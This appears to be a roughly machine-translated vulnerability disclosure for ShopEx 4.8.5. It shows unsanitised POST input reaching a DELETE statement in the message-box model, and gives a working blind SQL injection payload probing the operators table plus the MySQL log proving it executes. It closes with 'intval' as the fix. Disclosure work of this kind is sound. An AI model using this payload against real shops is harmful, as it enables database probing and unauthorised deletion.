Shopex injection vulnerability #2

And SQL injection vulnerability test version: shopex-singel-4.8.5.78660 file: \ core \ shop \ controller \ ctl. member. php

Function delTrackMsg () {if (! Empty ($ _ POST ['deltrack']) {$ oMsg = & $ this-> system-> loadModel ('resources/msgbox '); $ oMsg-> delTrackMsg ($ _ POST ['deltrack']); $ this-> splash ('success ', $ this-> system-> mkUrl ("member ", "track"), _ ('deleted successfully');} else {$ this-> splash ('failed ', $ this-> system-> mkUrl ("member", "track"), _ ('deletion failed: no record selected! '));}}

 

Follow up with $ oMsg-> delTrackMsg ($ _ POST ['deltrack']); in the file: \ core \ model_v5 \ resources \ mdl. msgbox. php

public function delTrackMsg( $aMsgId ){       foreach ( $aMsgId as $val )       {if ( $val ){$aTmp[] = $val;}}if ( $aTmp ){$this->db->exec( "DELETE FROM sdb_message WHERE msg_id IN (".implode( ",", $aTmp ).") AND del_status='1'" );$this->db->exec( "UPDATE sdb_message SET del_status='2' WHERE msg_id IN (".implode( ",", $aTmp ).")" );}return true;}

 

The SQL injection that appears in the DELETE statement is purely physical. Check whether the message is deleted and submit the data packet. deltrack [1] = 1) and (select count (*) from sdb_operators) = 1% 23 view SQL Execution records:

130526 20:31:25   360 Connect root@localhost on  360 Init DB shopex 360 Query SET NAMES 'utf8' 360 Query SELECT * FROM sdb_plugins WHERE plugin_type="app" 360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1 360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1 360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1 360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1 360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1 360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1 360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'

 

Execution successful vulnerability proof: Because (select count (*) from sdb_operators) = 1, The msg_id = 1 record is deleted. Let's guess...
  Solution:

Intval